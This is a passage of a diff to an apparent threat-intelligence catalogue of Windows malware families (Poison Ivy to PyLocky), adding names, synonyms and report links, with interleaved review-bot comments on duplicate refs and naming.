"https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "http://blogs.360.cn/post/APT_C_01_en.html" ], "synonyms": [ + "SPIVY", "pivy", "poisonivy" ], 
@@ -13312,6 +24375,53 @@
 "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7",
 "value": "Poison Ivy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "69605d66-d77e-4e7b-8c64-381e2cd97c14",
+ "value": "Poison RAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat",
+ "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf",
+ "https://youtu.be/DDA2uSxjVWY?t=344",
+ "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
+ ],
+ "synonyms": [
+ "KABOB",
+ "Zlib"
+ ],
+ "type": []
+ },
+ "uuid": "d30d5a0c-cbfb-49c3-99e7-1d6d1888fc2d",
+ "value": "Poldat"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "53371de9-291a-4d33-9fd2-058b43dddd5d",
+ "value": "PolyglotDuke"
+ },
 {
 "description": "",
 "meta": {
@@ -13330,8 +24440,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony",
- "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://www.uperesia.com/analysis-of-a-packed-pony-downloader",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex",
 "https://github.com/nyx0/Pony"
 ],
 "synonyms": [
@@ -13361,8 +24481,23 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time",
- "https://twitter.com/malwrhunterteam/status/806595092177965058"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
+ "https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019",
+ "https://asec.ahnlab.com/ko/18796/",
+ "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e166950b-2d0d-41e1-aee6-ccf0895ce9a5",
+ "value": "PoorWeb"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time"
 ],
 "synonyms": [],
 "type": []
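Review bot: The Pony refs list now carries the same SecureWorks profile twice, `http://www.secureworks.com/research/threat-profiles/gold-essex` and `https://www.secureworks.com/research/threat-profiles/gold-essex`, differing only in scheme; the same pair is added again in the Pushdo hunk (@@ -13640), where the pupy entry likewise lists the elfin-apt33 article under both `symantec-blogs.broadcom.com` and `www.symantec.com`. Since this cluster is regenerated from the Malpedia export, the cleaner fix is to deduplicate refs by scheme-insensitive normalised URL in the generator, or to report the duplicates upstream, rather than hand-editing the JSON. The mcafee ref is also removed and re-added at a different position, which suggests the export's ordering is not stable; sorting `refs` before writing the file would keep these diffs down to the actual additions.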
@@ -13401,7 +24536,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://paper.seebug.org/1301/",
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md",
+ "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/",
+ "https://github.com/nettitude/PoshC2_Python/",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html"
 ],
 "synonyms": [],
 "type": []
@@ -13413,20 +24558,83 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper",
- "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp",
+ "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
+ "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/",
+ "https://twitter.com/just_windex/status/1162118585805758464"
+ ],
+ "synonyms": [
+ "PUNCHTRACK"
+ ],
+ "type": []
+ },
+ "uuid": "15305d8b-55ff-47b2-b1c7-550a8a36ce36",
+ "value": "PoSlurp"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer",
+ "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/",
+ "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20"
+ ],
+ "synonyms": [
+ "Poullight"
+ ],
+ "type": []
+ },
+ "uuid": "e4bcb3e4-17f6-4786-a19b-255c48a07f9a",
+ "value": "Poulight Stealer"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks",
+ "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users",
+ "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file",
+ "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1",
- "value": "Poweliks Dropper"
+ "value": "Poweliks"
+ },
+ {
+ "description": ".NET variant of ps1.powerton.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband",
+ "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ab603f29-9c10-4fb0-9fa3-e123fad11a31",
+ "value": "POWERBAND"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://twitter.com/VK_Intel/status/1141540229951709184"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f19e4583-e14d-41b7-9b7a-2bd7eeffd4b1",
+ "value": "PowerCat"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
 "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
 ],
 "synonyms": [],
@@ -13448,6 +24656,19 @@
 "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475",
 "value": "powerkatz"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader",
+ "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "de96ba83-27ec-434c-b77f-7a06820b6e78",
+ "value": "PowerLoader"
+ },
 {
 "description": "",
 "meta": {
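Review bot: Cluster `782bee33-9f8d-41df-a608-c014bd6a7de1` keeps its UUID while its `value` changes from `Poweliks Dropper` to `Poweliks` and its Malpedia ref from `win.poweliks_dropper` to `win.poweliks`; as far as I know MISP derives the galaxy tag from `value`, so events already tagged with the old name would stop matching this cluster after the update. Carrying the old name forward as a synonym, `"synonyms": ["Poweliks Dropper"]`, or at least recording the rename in the galaxy changelog, would preserve that link. The same concern applies to the `Prikorma` → `Prikormka` correction on `00764634-4a21-4c5c-8b1f-fb294c9bdd3f` in hunk @@ -13530.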
@@ -13461,32 +24682,55 @@
 "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b",
 "value": "PowerPool"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner",
+ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1e2dfce6-1e38-4cff-a78e-b43a442ae8e6",
+ "value": "PowerShellRunner"
+ },
 {
 "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
+ "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
 "https://lokalhost.pl/gozi_tree.txt",
- "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/",
- "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/"
+ "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf"
+ ],
+ "synonyms": [
+ "PUNCHBUGGY"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52",
 "value": "Powersniff"
 },
 {
- "description": "",
+ "description": "QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\\windows\\temp\\",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
+ "https://content.fireeye.com/apt/rpt-apt38",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
- "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
+ "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/"
+ ],
+ "synonyms": [
+ "QUICKRIDE.POWER"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "606f778a-8b99-4880-8da8-b923651d627b",
@@ -13506,12 +24750,20 @@
 "value": "prb_backdoor"
 },
 {
- "description": "",
+ "description": "Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator",
+ "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
+ "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://securelist.com/a-predatory-tale/89779",
- "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware"
 ],
 "synonyms": [],
 "type": []
@@ -13530,7 +24782,7 @@
 "type": []
 },
 "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
- "value": "Prikorma"
+ "value": "Prikormka"
 },
 {
 "description": "",
@@ -13561,12 +24813,54 @@
 "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
 "value": "PrincessLocker"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook",
+ "https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d0c7815d-6039-436f-96ef-0767aabbdb36",
+ "value": "Project Hook POS"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus",
+ "https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d5724c6-646f-498a-b810-a6cee20f2b3c",
+ "value": "proteus"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot",
+ "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "03f30d04-4568-4c4c-88d6-b62efc72f33a",
+ "value": "ProtonBot"
+ },
 {
 "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module",
 "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
+ "https://twitter.com/seckle_ch/status/1169558035649433600",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure",
 "https://twitter.com/mesa_matt/status/1035211747957923840"
 ],
 "synonyms": [],
@@ -13575,6 +24869,22 @@
 "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9",
 "value": "PsiX"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a",
+ "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/"
+ ],
+ "synonyms": [
+ "ECCENTRICBANDWAGON"
+ ],
+ "type": []
+ },
+ "uuid": "1b1d3548-08db-4dff-878f-77d2f0b69777",
+ "value": "PSLogger"
+ },
 {
 "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.",
 "meta": {
@@ -13596,9 +24906,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
 "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
- "https://cert.gov.ua/news/42",
+ "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
+ "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/",
 "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://cert.gov.ua/news/42",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
 "https://cert.gov.ua/news/46"
 ],
 "synonyms": [],
@@ -13629,7 +24943,10 @@
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/",
 "https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
 ],
- "synonyms": [],
+ "synonyms": [
+ "pospunk",
+ "punkeypos"
+ ],
 "type": []
 },
 "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698",
@@ -13640,28 +24957,79 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
 "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
 "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://github.com/n1nj4sec/pupy",
 "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf"
+ ],
+ "synonyms": [
+ "Patpoopy"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
 "value": "pupy (Windows)"
 },
+ {
+ "description": "ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md",
+ "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e",
+ "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7a0f3f15-6920-4bc0-baa1-17dd8263948e",
+ "value": "PureLocker"
+ },
+ {
+ "description": "Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it's components. \r\n\r\nUpon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability. \r\n\r\nThe latest version of Purple Fox abuses open-source code to enable it's rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.\r\n\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "31638e2b-1c6b-47b9-bbb9-7316f206b354",
+ "value": "win.purplefox"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave",
+ "https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0b63109b-0b4d-4f5d-a475-c91af4eed857",
+ "value": "PurpleWave"
+ },
 {
 "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
 "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex",
 "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
- "https://www.secureworks.com/research/pushdo",
- "http://malware-traffic-analysis.net/2017/04/03/index2.html"
+ "http://malware-traffic-analysis.net/2017/04/03/index2.html",
+ "https://www.secureworks.com/research/pushdo"
 ],
 "synonyms": [],
 "type": []
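Review bot: The new Purple Fox cluster uses the Malpedia identifier as its display name, `"value": "win.purplefox"`, whereas every other entry in this hunk uses a human-readable name (`PureLocker`, `PurpleWave`) and keeps the identifier only in the `malpedia.caad.fkie.fraunhofer.de/details/...` ref. Unless the upstream export is corrected, the generator should map this one to `"value": "Purple Fox"` so the resulting galaxy tag reads like its neighbours. The description of that entry also ends in a literal `\r\n\r\n` run, which presumably should be trimmed at export time rather than stored.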
@@ -13694,11 +25062,46 @@
 "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e",
 "value": "PvzOut"
 },
+ {
+ "description": "PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
+ "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
+ "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
+ "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.group-ib.com/blog/prolock",
+ "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/"
+ ],
+ "synonyms": [
+ "ProLock"
+ ],
+ "type": []
+ },
+ "uuid": "fe0cf4ab-f151-4549-8127-f669c319d546",
+ "value": "PwndLocker"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
 "https://twitter.com/physicaldrive0/status/573109512145649664",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/",
 "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html"
@@ -13714,6 +25117,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa",
+ "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
 "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/",
 "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
 "https://www.youtube.com/watch?v=HfSQlC76_s4"
@@ -13729,9 +25133,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
- "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/",
+ "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
 "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/"
 ],
 "synonyms": [
@@ -13742,6 +25150,30 @@
 "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490",
